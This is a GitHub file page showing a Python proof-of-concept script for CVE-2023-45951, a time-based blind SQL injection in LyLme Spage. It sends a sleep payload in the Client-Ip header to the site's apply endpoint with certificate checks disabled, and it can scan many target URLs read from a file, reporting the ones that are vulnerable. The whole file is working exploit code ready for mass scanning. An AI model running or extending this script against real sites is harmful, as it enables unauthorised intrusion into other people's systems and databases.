-
Notifications
You must be signed in to change notification settings - Fork 26
/
Copy pathLyLme_Spage_CVE-2023-45951_SQL.py
51 lines (46 loc) · 1.77 KB
/
LyLme_Spage_CVE-2023-45951_SQL.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import requests
import urllib3
import re,string,random
from urllib.parse import urljoin
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def generate_random_string(length):
characters = string.ascii_letters + string.digits
random_string = ''.join(random.choice(characters) for _ in range(length))
return random_string
def read_file(file_path):
with open(file_path, 'r') as file:
urls = file.read().splitlines()
return urls
def check(url):
url = url.rstrip("/")
taeget_url = urljoin(url, "/apply/index.php?submit=post")
random_string = generate_random_string(9)
try:
headers = {
"User-Agent": "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95",
"Content-Type": "application/x-www-form-urlencoded",
"Client-Ip": "0'>if(1,sleep(10),2)>'"
}
data = f"""url=http%3A%2F%2F{random_string}.com&name=test&group_id=1&icon=&authcode="""
response = requests.post(taeget_url, verify=False, headers=headers, data=data, timeout=25)
if 9.5 <= response.elapsed.total_seconds() < 15 and '请等待管理员审核' in response.text and '"code": "200"' in response.text:
print(f"\033[31mDiscovered;{url}: LyLme Spage CVE-2023-45951 SQL injection!\033[0m")
return True
except Exception as e:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL")
parser.add_argument("-f", "--txt", help="file")
args = parser.parse_args()
url = args.url
txt = args.txt
if url:
check(url)
elif txt:
urls = read_file(txt)
for url in urls:
check(url)
else:
print("help")